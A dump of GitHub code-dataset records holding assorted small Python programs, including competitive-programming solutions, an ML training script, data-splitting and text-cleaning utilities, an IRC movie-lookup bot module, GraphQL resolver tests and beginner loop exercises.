TotNetPay)\n","repo_name":"BamaBoy8807/CIS-261_Course-Project_Jeff-Woosley","sub_path":"CIS_261_Course_Project_Jeff_Woosley.py","file_name":"CIS_261_Course_Project_Jeff_Woosley.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3727977160","text":"class Solution:\n def maxProduct(self, words: List[str]) -> int:\n ele_dict = {}\n for indx , val in enumerate(words):\n bit_map = 0\n for char in val:\n bit_map |= 1 << (ord(char) - ord('a'))\n ele_dict[indx] = bit_map\n \n max_word = 0\n for indx in range(len(words)):\n\n for inner in range(indx + 1 , len(words)):\n\n if ele_dict[indx] & ele_dict[inner] == 0:\n product = len(words[indx]) * len(words[inner])\n max_word = max(max_word , product)\n\n return max_word\n","repo_name":"zerabruck/Competitive-programming","sub_path":"A2sv/maximum_product_of_word_lengths.py","file_name":"maximum_product_of_word_lengths.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24405194777","text":"import cv2\r\nimport numpy as np\r\n\r\na = input(\"Enter name of image = \")\r\n\r\n\r\nimg = cv2.imread(\"muskan.jpg\")\r\n\r\nr, c = img.shape[:2]\r\n\r\nm = np.float32([[1, 0, 100], [0, 1, 100]])\r\n\r\nnew_img = cv2.warpAffine(img, m, (c, r))\r\n\r\ncv2.imwrite(\"a.jpg\", new_img)\r\n\r\ncv2.imshow(\"translation\", new_img)\r\ncv2.waitKey(0)\r\n\r\ncv2.destroyAllWindows()\r\n","repo_name":"DEEPESH98/OpenCV","sub_path":"openCV_Project/new_1.py","file_name":"new_1.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43037826967","text":"def main():\n n = int(input())\n S = []\n T = []\n for _ in range(n):\n s, t = input().split()\n S.append(s)\n T.append(t)\n\n ans = 'No'\n for i in range(n):\n for j in range(i+1, n):\n if (S[i] == S[j]) and (T[i] == T[j]):\n ans = 'Yes'\n break\n\n print(ans)\n\n\nmain()","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/ABC216-B.py","file_name":"ABC216-B.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17614763394","text":"import os, sys\nimport numpy as np\nimport torch\nimport pytorch_lightning as pl\nfrom six.moves import cPickle\nfrom evoaug import evoaug\n\nsys.path.append('../../evoaug_analysis')\nimport utils\nfrom model_zoo import CNN\n\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\noutput_dir = '../results/chipseq'\nutils.make_directory(output_dir)\n\n\nexpt_names = ['GABPA', 'MAX', 'BACH1', 'REST', 'SRF', 'ZNF24', 'ELK1']\nnum_trials = 5 \n\nfor expt_name in expt_names:\n\n data_path = '../data'\n filepath = os.path.join(data_path, expt_name + '_200.h5')\n data_module = utils.H5DataModule(filepath, batch_size=100, lower_case=True)\n\n\n trial_results = []\n for trial in range(num_trials):\n\n cnn = CNN(data_module.y_train.shape[-1]).to(device)\n loss = torch.nn.BCELoss()\n optimizer_dict = utils.configure_optimizer(cnn, \n lr=0.001, \n weight_decay=1e-6, \n decay_factor=0.1, \n patience=5, \n monitor='val_loss')\n\n robust_cnn = evoaug.RobustModel(cnn,\n criterion=loss,\n optimizer=optimizer_dict, \n augment_list=[])\n\n # create pytorch lightning trainer\n ckpt_path = expt_name+\"_baseline_\"+str(trial)\n callback_topmodel = pl.callbacks.ModelCheckpoint(monitor='val_loss', \n save_top_k=1, \n dirpath=output_dir, \n filename=ckpt_path)\n callback_es = pl.callbacks.early_stopping.EarlyStopping(monitor='val_loss', patience=10)\n trainer = pl.Trainer(gpus=1, max_epochs=100, auto_select_gpus=True, logger=None, \n callbacks=[callback_es, callback_topmodel])\n\n # fit model\n trainer.fit(robust_cnn, datamodule=data_module)\n\n # load checkpoint for model with best validation performance\n model_path = os.path.join(output_dir, ckpt_path+'.ckpt')\n robust_cnn = evoaug.load_model_from_checkpoint(robust_cnn, model_path)\n\n # evaluate best model\n pred = utils.get_predictions(robust_cnn, data_module.x_test, batch_size=100)\n results = utils.evaluate_model(data_module.y_test, pred, task='binary') \n\n # store results\n trial_results.append(results)\n\n # save results\n with open(os.path.join(output_dir, expt_name+'_baseline.pickle'), 'wb') as fout:\n cPickle.dump(trial_results, fout)\n\n\n ","repo_name":"p-koo/evoaug_analysis","sub_path":"analysis/main/chip_baseline.py","file_name":"chip_baseline.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18984589405","text":"from __future__ import print_function\nfrom extractTrain import search, myfile\nimport logging\nimport os.path\nimport sys\nimport re\nimport codecs\n\n#reload(sys)\n#sys.setdefaultencoding('utf8')\ndef main1():\n\tfolder = r\"/Users/mac/Documents/LearnPython/KeywordExtraction/data/SemEval2010/train\"\n\tfilters = ['C','H','I','J']\n\t# filters = ['C']\n\tallfile = []\n\tallfile = search(folder, filters, allfile)\n\tfile_len = len(allfile)\n\tprint('共查找到%d个摘要文件' % (file_len))\n\tfor f in allfile:\n\t\tcur_name = os.path.basename(f)\n\t\tletter = os.path.basename(f)[0]\n\t\tfor i in range(2, len(os.path.basename(f))):\n\t\t\tif os.path.basename(f)[i] != '.':\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tnumber = int(os.path.basename(f)[2:i])\n\t\t\t\tbreak\n\t\toutput_file = open('../data/SemEval2010/train_removed/%s-%d.txt' % (letter, number), 'w', encoding='utf-8')\n\t\twith open(f, 'r', encoding='utf-8') as curf:\n\t\t\tfor line in curf.readlines():\n\t\t\t\tss = re.sub(\n\t\t\t\t\t\"[\\s+\\.\\!\\/_,;\\[\\]><•¿#&«»∗`={}|1234567890¡?():$%^*(+\\\"\\']+|[+!,。?;:、【】《》“”‘’~@#¥%……&*()''\"\"]+\", \" \", line)\n\t\t\t\tss += \"\\n\"\n\t\t\t\toutput_file.write(\"\".join(ss.lower()))\n\n\t\toutput_file.close()\n\n\ndef main2():\n\tprogram = os.path.basename(sys.argv[0])\n\tlogger = logging.getLogger(program)\n\tlogging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s')\n\tlogging.root.setLevel(level=logging.INFO)\n\tlogger.info(\"running %s\" % ' '.join(sys.argv))\n\tif len(sys.argv) != 3:\n\t\tprint(\"Using: python filter.py xxx.txt xxxx.txt\")\n\t\tsys.exit(1)\n\tinp, outp = sys.argv[1:3]\n\toutput = codecs.open(outp, 'w', encoding='utf-8')\n\tinp = codecs.open(inp, 'r', encoding='utf-8')\n\ti = 0\n\tfor line in inp.readlines():\n\t\t# ss = re.sub(\"[\\s+\\.\\!\\/_,;-><¿#&«-»=|1234567890¡?():$%^*(+\\\"\\']+|[+——!,。?;:、【】《》“”‘’~@#¥%……&*()''\"\"]+\".decode(\"utf-8\"), \" \".decode(\"utf-8\"),line)\n\t\t# ss = re.sub(\"[\\s+\\.\\!\\/_,;\\[\\]><•¿#&«»∗`{}=|1234567890¡?():$%^*(+\\\"\\']+|[+!,。?℃;:、【】《》“”‘’~@#¥%……&*()''\"\"]+\", \" \",\n\t\t# \t\t\tline)\n\t\tss = re.sub('[。,:;、1234567890()]+', '', line)\n\t\t# ss += \"\\n\"\n\t\t# output.write(\"\".join(ss.lower()))\n\t\toutput.write(ss)\n\t\ti = i + 1\n\t\tif (i % 10000 == 0):\n\t\t\tlogger.info(\"Saved \" + str(i) + \" articles\")\n\t# break\n\toutput.close()\n\tinp.close()\n\tlogger.info(\"Finished removed words!\")\n\ndef my_write(begin_write, cur_line, output_name):\n\t\tif begin_write:\n\t\t\tout_file = open(output_name, 'a', encoding='utf-8')\n\t\t\tout_file.write(cur_line)\n\t\t\tout_file.close()\n\ndef get_content():\n\tinp = open('../data/raw/SemEval2010_train_raw.txt', 'r', encoding='utf-8')\n\tbegin_write = False\n\tlines = inp.readlines()\n\tfor line in lines:\n\t\tif 'ABSTRACT' in line:\n\t\t\tbegin_write = True\n\t\t\tcontinue\n\t\tif 'REFERENCES' in line:\n\t\t\tbegin_write = False\n\t\t\tcontinue\n\t\tmy_write(begin_write, line, '../data/SE2010_content.txt')\n\tinp.close()\n\n\nif __name__ == '__main__':\n\tmain2()\n\t#get_content()\n\t# f1 = open('../data/raw/SemEval2010_train_raw.txt', 'r', encoding='utf-8')\n\t# f2 = open('../data/SE2010_content.txt', 'r', encoding='utf-8')\n\t# print(len(f1.readlines()))\n\t# print(len(f2.readlines()))\n\t# f1.close()\n\t# f2.close()","repo_name":"NoteXYX/KeywordExtraction","sub_path":"scripts/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22756429217","text":"import os\nimport math\nimport json\nimport numpy as np\nimport pandas as pd\n\nimport collections\nimport torch\n\ndef data_split(rootDir, filename):\n \n select_ID=pd.read_csv(filename)\n select_ID.drop(select_ID[select_ID['FILE_ID']=='no_filename'].index, inplace=True)\n select_ID.drop(select_ID[select_ID['func_mean_fd']>=0.2].index, inplace=True)\n \n data = os.listdir(rootDir)\n \n data_set = collections.defaultdict(list)\n annot_data_set = collections.defaultdict(list)\n\n \n list_data = []; data_path = []; data_path_full = []\n for i in data:\n folder_list = []; path_list = []; path_list_full = []\n for j in os.listdir(os.path.join(rootDir, i)):\n for k in os.listdir(os.path.join(rootDir, i, j)):\n if k.split('.')[-1] == 'gz':\n path_list.append(k.split('func_preproc')[0])\n path_list_full.append(os.path.join(rootDir,i,j,k))\n list_data.append(folder_list)\n data_path.append(path_list)\n data_path_full.append(path_list_full)\n index = []; ASD_annotations = []; TC_annotations = []; genre = []; ASD = []; TC = []\n \n for j,i in enumerate(data_path[2]):\n for l,k in enumerate(select_ID['FILE_ID'].values):\n if i == (k + str('_')):\n if select_ID['DX_GROUP'].values[l]==1:\n ASD_annotations.append(0) #ASD\n ASD.append(j)\n if select_ID['DX_GROUP'].values[l]==2:\n TC_annotations.append(1) #TC\n TC.append(j)\n index.append(j)\n if select_ID['SEX'].values[l]==1:\n genre.append(0) #ASD\n if select_ID['SEX'].values[l]==2:\n genre.append(1) #TC\n\n #ASD_train = math.ceil(0.7 * len(ASD))\n ASD_train = len(ASD[:3])\n #ASD_valid = math.ceil(0.2 * len(ASD))\n ASD_valid = len(ASD[3:6])\n #ASD_test = len(ASD) - ASD_train - ASD_valid\n ASD_test = len(ASD[6:9])\n \n ASDtrain_split, ASDtest_split, ASDvalid_split = torch.utils.data.random_split(ASD[:9], (ASD_train, ASD_test, ASD_valid))\n\n #ASD_train_annotations = math.ceil(0.7 * len(ASD_annotations))\n ASD_train_annotations = len(ASD_annotations[:3])\n #ASD_valid_annotations = math.ceil(0.2 * len(ASD_annotations))\n ASD_valid_annotations = len(ASD_annotations[3:6])\n #ASD_test_annotations = len(ASD_annotations) - ASD_train_annotations - ASD_valid_annotations\n ASD_test_annotations = len(ASD_annotations[6:9])\n ASDtrain_annot_split, ASDtest_annot_split, ASDvalid_annot_split = torch.utils.data.random_split(ASD_annotations[:9], (ASD_train_annotations, ASD_test_annotations, ASD_valid_annotations))\n \n #TC_train = int(0.7 * len(TC))\n TC_train = len(TC[:3])\n #TC_valid = int(0.2 * len(TC))\n TC_valid = len(TC[3:6])\n #TC_test = len(TC) - TC_train - TC_valid\n TC_test = len(TC[6:9])\n TCtrain_split, TCtest_split, TCvalid_split = torch.utils.data.random_split(TC[:9], (TC_train, TC_test, TC_valid))\n\n #TC_train_annotations = int(0.7 * len(TC_annotations))\n TC_train_annotations = len(TC_annotations[:3])\n #TC_valid_annotations = int(0.2 * len(TC_annotations))\n TC_valid_annotations = len(TC_annotations[3:6])\n #TC_test_annotations = len(TC_annotations) - TC_train_annotations - TC_valid_annotations\n TC_test_annotations = len(TC_annotations[6:9])\n TCtrain_annot_split, TCtest_annot_split, TCvalid_annot_split = torch.utils.data.random_split(TC_annotations[:9], (TC_train_annotations, TC_test_annotations, TC_valid_annotations))\n\n \n for i in ASDtrain_split:\n data_set['train'].append({ \n 'img':data_path_full[0][i]\n })\n for i in ASDtrain_annot_split:\n annot_data_set['train'].append({ \n 'annot':i\n })\n for i in TCtrain_split:\n data_set['train'].append({ \n 'img':data_path_full[0][i]\n })\n for i in TCtrain_annot_split:\n annot_data_set['train'].append({ \n 'annot':i\n })\n \n \n for i in ASDtest_split:\n data_set['test'].append({ \n 'img':data_path_full[0][i]\n })\n for i in ASDtest_annot_split:\n annot_data_set['test'].append({ \n 'annot':i\n })\n for i in TCtest_split:\n data_set['test'].append({ \n 'img':data_path_full[0][i]\n })\n for i in TCtest_annot_split:\n annot_data_set['test'].append({ \n 'annot':i\n })\n \n \n for i in ASDvalid_split:\n data_set['valid'].append({ \n 'img':data_path_full[0][i]\n })\n for i in ASDvalid_annot_split:\n annot_data_set['valid'].append({ \n 'annot':i\n })\n for i in TCvalid_split:\n data_set['valid'].append({ \n 'img':data_path_full[0][i]\n })\n for i in TCvalid_annot_split:\n annot_data_set['valid'].append({ \n 'annot':i\n })\n\n with open('data_example_6.json', 'w') as fp:\n json.dump(data_set, fp)\n\n with open('annotation_example_6.json', 'w') as fp:\n json.dump(annot_data_set, fp)\n #breakpoint()\n return data_set, annot_data_set\n\nrootDir = os.path.join('/media/disk1/user_home1/lvbellon/PROJECT/Outputs/cpac')\nfilename = r'/home/lvbellon/PROJECT/Phenotypic_V1_0b_preprocessed1.csv'\n\ndata_split = data_split(rootDir, filename)\n#breakpoint()\n#print(data_split)","repo_name":"lvbellon/ASDNet","sub_path":"data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31404851848","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n def partition(self, head: ListNode, x: int) -> ListNode:\r\n left_dummy=ListNode(-1)\r\n right_dummy=ListNode(-1)\r\n \r\n left_cur=left_dummy\r\n right_cur=right_dummy\r\n while head: \r\n cur=head\r\n if cur.val < x:\r\n left_cur.next=cur\r\n left_cur=cur\r\n else:\r\n right_cur.next=cur\r\n right_cur=cur\r\n head =head.next\r\n left_cur.next=right_dummy.next\r\n right_cur.next=None\r\n \r\n return left_dummy.next","repo_name":"zhangleiray007/Leetcode-Python","sub_path":"86_Partition List.py","file_name":"86_Partition List.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22818022324","text":"month = int(input(\"Inserisci in numero il tuo mese di nascita: \"))\nday = int(input(\"Inserisci in numero il tuo giorno di nascita: \"))\n\nzodiacSign = \"\"\n\nif (month == 12 and day >= 22) or (month == 1 and day <= 19):\n\tzodiacSign = \"Capricorno\"\n\t\nelif (month == 1 and day >= 20) or (month == 2 and day <= 18):\n\tzodiacSign = \"Acquario\"\n\t\nelif (month == 2 and day >= 19) or (month == 3 and day <= 20):\n\tzodiacSign = \"Pesci\"\n\t\nelif (month == 3 and day >= 21) or (month == 4 and day <= 19):\n\tzodiacSign = \"Ariete\"\n\t\nelif (month == 4 and day >= 20) or (month == 5 and day <= 20):\n\tzodiacSign = \"Toro\"\n\nelif (month == 5 and day >= 21) or (month == 6 and day <= 20):\n\tzodiacSign = \"Gemini\"\n\t\nelif (month == 6 and day >= 21) or (month == 7 and day <= 22):\n\tzodiacSign = \"Cancro\"\n\t\nelif (month == 7 and day <= 23) or (month == 8 and day <= 22):\n\tzodiacSign = \"Leone\"\n\t\nelif (month == 8 and day >= 23) or (month == 9 and day <= 22):\n\tzodiacSign = \"Vergine\"\n\t\nelif (month == 9 and day >= 23) or (month == 10 and day <= 22):\n\tzodiacSign = \"Libra\"\n\t\nelif (month == 10 and day <= 23) or (month == 11 and day <= 21):\n\tzodiacSign = \"Scorpione\"\n\t\nelif (month == 11 and day <= 22) or (month == 12 and day <= 21):\n\tzodiacSign = \"Sagittario\"\n\t\nprint(zodiacSign)\n\n","repo_name":"GdDev00/PythonWorkbook","sub_path":"Part Two/_47.py","file_name":"_47.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43166306747","text":"# TRP-3-22, Банницин Дмитрий\n\n# 1\n\nimport random\nprint(\"Дано целое число N (> 0). Найти квадрат данного числа, используя для\"\n \" его вычисления следующую формулу: N2 = 1 + 3 + 5 + … + (2*N - 1).\"\n \" После добавления к сумме каждого слагаемого выводить текущее\"\n \" значение суммы (в результате будут выведены квадраты всех целых\"\n \" чисел от 1 до N).\")\n\nN = int(input(\"N = \"))\nsum = 0\n\nfor n in range(1, N * 2, 2):\n sum += n\n print(sum)\n\n# 2\n\nprint(\"Дано целое число N (> 0). Найти значение выражения 1.1 – 1.2 + 1.3\"\n \" – … (N слагаемых, знаки чередуются). Условный оператор не\"\n \" использовать.\")\n\nN = int(input(\"N = \"))\nsum = 0\nk = -1\n\nfor n in range(1, N + 1, 1):\n k *= -1\n sum += k * (1 + n/10)\nprint(round(sum, 1))\n\n# 3\n\nprint(\"Дано целое число N (> 2). Последовательность целых чисел AK\"\n \"определяется следующим образом: A1 = 1, A2 = 2, A3 = 3, AK = AK–1 +\"\n \"AK–2 – 2·AK–3, K = 4, 5, … . Вывести элементы A1, A2, …, AN\")\n\ndef getAk(k):\n if k <= 3:\n return k\n else:\n return getAk(k-1) + getAk(k-2) - 2 * getAk(k-3)\n\nN = int(input(\"N = \"))\nprint(\"Answer: \")\nfor n in range(1, N + 1, 1):\n print(getAk(n))\n\n# 4\n\nprint(\"Даны целые положительные числа A и B (A < B). Вывести все целые числа\"\n \" от A до B включительно; при этом каждое число должно выводиться\"\n \" столько раз, каково его значение (например, число 3 выводится 3 раза).\")\n\nA = int(input(\"A = \"))\nB = int(input(\"B = \"))\nprint(\"Answer: \")\n\nfor n in range(A, B + 1, 1):\n for m in range(1, n+1, 1):\n print(n, end=\"\")\n print()\n\n# 5\n\nprint(\"Дано целое число N (> 0). Найти двойной факториал N: N!! = N·(N–\"\n \"2)·(N–4)·… (последний сомножитель равен 2, если N — четное, и 1,если\"\n \"N — нечетное).\")\n\nN = int(input(\"N = \"))\n\nprint(\"Answer: \")\n\nif N % 2 == 1:\n n = 1\nelse:\n n = 2\nans = 1\nwhile n <= N:\n ans *= n\n n += 2\nprint(ans)\n\n# 6\n\nprint(\"Дано число A (> 1). Вывести наибольшее из целых чисел K, для\"\n \" которых сумма 1 + 1/2 + … + 1/K будет меньше A, и саму эту сумму.\")\n\nA = int(input(\"A = \"))\n\nprint(\"Answer: \")\nsum = 0\nk = 1\nwhile sum < A:\n sum += 1/k\n k += 1\nprint(k-1, sum)\n\n# 7\n\nprint(\"Дано целое число N ( > 1). Последовательность чисел Фибоначчи FK\"\n \" определяется следующим образом: F1=1, F2=1, FK=FK–2 + FK–1, K=3,\"\n \" 4, … . Проверить, является ли число N числом Фибоначчи. Если\"\n \" является, то вывести True, если нет — вывести False.\")\n\nN = int(input(\"N = \"))\n\nf1 = 1\nf2 = 1\nf3 = 2\n\nprint(\"Answer: \")\n\nwhile f1 <= N:\n if f1 == N or f2 == N or f3 == N:\n print(True)\n quit()\n f1 = f2 + f3\n f2 = f3 + f1\n f3 = f1 + f2\nprint(False)\n\n# 8\n\nprint(\"Дано целое число N и набор из N вещественных чисел. Вывести в том\"\n \" же порядке округленные значения всех чисел из данного набора(как целые\"\n \" числа), а также сумму всех округленных значений.\")\n\nN = int(input(\"N = \"))\nk = 0\nsum = 0\nnumbers = []\nprint(\"Answer: \")\n\nk = 0\n\nwhile k < N:\n temp = int(random.uniform(1, 100))\n print(temp)\n sum += temp\n k += 1\nprint(\"sum = \", sum)\n\n# 9\n\nprint(\"Дано целое число N и набор из N целых чисел. Вывести в том же\"\n \" порядке номера всех нечетных чисел из данного набора и количество K\"\n \" таких чисел.\")\n\nN = int(input(\"N = \"))\nk = 0\ncount = 0\nprint(\"Answer: \")\n\nk = 0\n\nwhile k < N:\n temp = random.randint(1, 100)\n if temp % 2 == 1:\n print(k)\n count += 1\n k += 1\nprint(\"count = \", count)\n\n# 10\n\nprint(\"Дано целое число N и набор из N целых чисел, упорядоченный по\"\n \" возрастанию. Данный набор может содержать одинаковые элементы.\"\n \" Вывести в том же порядке все различные элементы данного набора.\")\n\nN = int(input(\"N = \"))\nk = 0\nprint(\"Answer: \")\ncurrent = 99999\nk = 0\n\nwhile k < N:\n previous = current\n current = int(input(\"num = \"))\n if previous != current:\n print(current)\n k += 1\n\n# 11\n\nprint(\"Дано целое число N и набор из N целых чисел, содержащий по крайней\"\n \" мере два нуля. Вывести сумму чисел из данного набора,\"\n \" расположенных между последними двумя нулями(если последние\"\n \" нули идут подряд, то вывести 0).\")\n\nN = int(input(\"N = \"))\nk = 0\nsum = 0\ntempsum = 0\nk = 0\n\nwhile k < N:\n temp = int(input(\"num = \"))\n if temp == 0:\n sum = tempsum\n tempsum = 0\n tempsum += temp\n k += 1\n\nprint(\"Answer: \")\nprint(\"sum = \", sum)\n\n# 12\n\nprint(\"Даны целые числа K, N, а также K наборов целых чисел по N элементов\"\n \" в каждом наборе. Для каждого набора вывести номер его первого\"\n \" элемента, равного 2, или число 0, если в данном наборе нет двоек.\")\n\nN = int(input(\"N = \"))\nK = int(input(\"K = \"))\ni = 0\nj = 0\nprint(\"Answer: \")\n\nwhile i < K:\n while j < N:\n temp = random.randint(0, 100)\n if temp == 2:\n print(j)\n break\n elif j == N-1:\n print(0)\n j += 1\n i += 1\n j = 0\n\n# 13\n\nprint(\"Дано целое число N, а также K наборов ненулевых целых чисел.\"\n \" Признаком завершения каждого набора является число 0. Для каждого\"\n \" набора вывести количество его элементов. Вывести также общее\"\n \" количество элементов во всех наборах.\")\n\nK = int(input(\"K = \"))\ni = 0\nj = 0\nsum = 0\n\nwhile i < K:\n temp = int(input(\"num =\"))\n while temp != 0:\n temp = int(input(\"num =\"))\n j += 1\n sum += 1\n print(j)\n i += 1\n j = 0\n\nprint(sum)\n\n# 14\n\nprint(\"Дано целое число K, а также K наборов ненулевых целых чисел.\"\n \" Каждый набор содержит не менее двух элементов, признаком его\"\n \" завершения является число 0. Найти количество наборов, элементы\"\n \" которых возрастают.\")\n\nK = int(input(\"K = \"))\ni = 0\nj = 0\nflag = True\ncount = 0\n\nwhile i < K:\n temp = int(input(\"num =\"))\n while temp != 0:\n previous = temp\n temp = int(input(\"num =\"))\n if temp != 0 and temp < previous:\n flag = False\n j += 1\n if flag:\n count += 1\n flag = True\n i += 1\n j = 0\n\nprint(\"Answer: \", count)\n\n# 15\n\nprint(\"Дано целое число K, а также K наборов ненулевых целых чисел.\"\n \" Каждый набор содержит не менее двух элементов, признаком его\"\n \" завершения является число 0. Для каждого набора выполнить\"\n \" следующее действие: если элементы набора возрастают, то вывести 1\"\n \" если элементы набора убывают, то вывести –1\"\n \" если элементы набора\"\n \"не возрастают и не убывают, то вывести 0.\")\n\nK = int(input(\"K = \"))\ni = 0\nj = 0\nincrease = True\ndecrease = True\n\nwhile i < K:\n temp = int(input(\"num =\"))\n while temp != 0:\n previous = temp\n temp = int(input(\"num =\"))\n if temp != 0 and temp < previous:\n increase = False\n if temp > previous:\n decrease = False\n j += 1\n if increase:\n print(1)\n elif decrease:\n print(-1)\n else:\n print(0)\n increase = True\n decrease = True\n i += 1\n\n# 16\n\nprint(\"Дано целое число N ( > 2) и набор из N вещественных чисел. Набор\"\n \" называется пилообразным, если каждый его внутренний элемент либо\"\n \" больше, либо меньше обоих своих соседей(то есть является\"\n \" «зубцом»). Если данный набор является пилообразным, то вывести 0\"\n \"в противном случае вывести номер первого элемента, не являющегося\"\n \" зубцом.\")\n\npreprevious = 0\nprevious = 0\n\ni = 0\nN = int(input(\"N = \"))\nwhile i < N:\n if i > 0:\n preprevious = previous\n previous = temp\n temp = float(input(\"num = \"))\n if i > 1:\n if not (previous < preprevious and previous < temp or previous > preprevious and previous > temp):\n print(\"Answer: \", i)\n quit()\n i += 1\n\nprint(\"Answer: \", 0)","repo_name":"MY5T3RI0/APSH","sub_path":"ТРП-3-22_Банницин_4.py","file_name":"ТРП-3-22_Банницин_4.py","file_ext":"py","file_size_in_byte":10195,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70420047732","text":"import sopel\nimport tmdbsimple as tmdb\n\n@sopel.module.commands('movie')\ndef tmdb_command(bot, trigger):\n movie_title = trigger.group(2)\n\n tmdb.API_KEY = 'API_KEY'\n search = tmdb.Search()\n response = search.movie(query=movie_title)\n\n try:\n result = response['results'][0]\n tmdb_id = result['id']\n url = f'https://www.2embed.to/embed/tmdb/movie?id={tmdb_id}'\n \n bot.say(url)\n except IndexError:\n bot.say(\"Sorry, nothing found.\")\n","repo_name":"klppl/sopel-modules","sub_path":"movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23154051650","text":"import sys\nimport os\nfrom os.path import dirname, join, expanduser, normpath, realpath\n\nimport pytest\nfrom graphene.test import Client\n\nfrom unittest import TestCase\n\nfrom manage import seed, remove_seed\n\nseed()\nfrom app import app\nfrom db import db\nfrom models import Sectors, Groups\nfrom queries import schema\n\nremove_seed()\n\n# This is the only way I could get imports to work for unit testing.\nPACKAGE_PARENT = '..'\nSCRIPT_DIR = dirname(realpath(join(os.getcwd(), expanduser(__file__))))\nsys.path.append(normpath(join(SCRIPT_DIR, PACKAGE_PARENT)))\n\n@pytest.fixture(scope='class')\ndef group_test_db_init():\n db.init_app(app)\n with app.app_context():\n sector = Sectors(\n id=1,\n zone=\"GC\",\n sector=\"GC_A\",\n description=\"Arts\"\n )\n db.session.add(sector)\n\n sector = Sectors(\n id=2,\n zone=\"GC\",\n sector=\"GC_BF\",\n description=\"Banking and Finance\"\n )\n db.session.add(sector)\n\n sector = Sectors(\n id=25,\n zone=\"TEST\",\n sector=\"TEST_DEV\",\n description=\"Development test cases\"\n )\n db.session.add(sector)\n db.session.commit()\n group = Groups(\n id=1,\n s_group='GC_A',\n description='Arts',\n sector_id=1\n )\n db.session.add(group)\n\n group = Groups(\n id=2,\n s_group='GC_BF',\n description='Banking and Finance',\n sector_id=2\n )\n db.session.add(group)\n\n yield\n\n with app.app_context():\n Groups.query.delete()\n Sectors.query.delete()\n db.session.commit()\n\n@pytest.mark.usefixtures('group_test_db_init')\nclass TestGroupResolver(TestCase):\n def test_get_group_resolvers_by_id(self):\n \"\"\"Test get_group_by_id resolver\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupById(id:1) {\n sGroup,\n description\n }\n }\"\"\"\n result_refr = {\n \"data\": {\n \"getGroupById\": [\n {\n \"sGroup\": \"GC_A\",\n \"description\": \"Arts\"\n }\n ]\n }\n }\n\n result_eval = client.execute(query)\n self.assertDictEqual(result_refr, result_eval)\n\n def test_get_group_resolvers_by_group(self):\n \"\"\"\"Test get_group_by_group resolver\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupByGroup(group: GC_A){\n description\n sectorId\n }\n }\"\"\"\n result_refr = {\n \"data\": {\n \"getGroupByGroup\": [\n {\n \"description\": \"Arts\",\n \"sectorId\": 1\n }\n ]\n }\n }\n\n result_eval = client.execute(query)\n self.assertDictEqual(result_refr, result_eval)\n\n def test_get_group_resolvers_by_sector(self):\n \"\"\"Test get_group_by_sector_id resolver\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupBySector(sector: GC_A){\n description\n groupSector{\n id\n zone\n description\n }\n }\n }\"\"\"\n result_refr = {\n \"data\": {\n \"getGroupBySector\": [\n {\n \"description\": \"Arts\",\n \"groupSector\": {\n \"id\": \"U2VjdG9yczox\",\n \"zone\": \"GC\",\n \"description\": \"Arts\"\n }\n }\n ]\n }\n }\n\n result_eval = client.execute(query)\n self.assertDictEqual(result_refr, result_eval)\n\n def test_group_resolver_by_id_invalid(self):\n \"\"\"Test get_group_by_id invalid ID error handling\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupById(id: 9999){\n id\n description\n sectorId\n }\n }\"\"\"\n executed = client.execute(query)\n\n assert executed['errors']\n assert executed['errors'][0]\n assert executed['errors'][0]['message'] == \"Error, Invalid ID\"\n\n def test_group_resolver_by_group_invalid(self):\n \"\"\"Test get_group_by_group invalid sector error handling\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupByGroup(group: fds){\n id\n description\n sectorId\n }\n }\"\"\"\n executed = client.execute(query)\n\n assert executed['errors']\n assert executed['errors'][0]\n assert executed['errors'][0][\n 'message'] == f'Argument \"group\" has invalid value fds.\\nExpected type \"GroupEnums\", found fds.'\n\n def test_group_resolver_by_sector_invalid(self):\n \"\"\"Test get_group_by_sector invalid Zone error handling\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupBySector(sector: dsa){\n id\n description\n sectorId\n }\n }\"\"\"\n executed = client.execute(query)\n\n assert executed['errors']\n assert executed['errors'][0]\n assert executed['errors'][0][\n 'message'] == f'Argument \"sector\" has invalid value dsa.\\nExpected type \"SectorEnums\", found 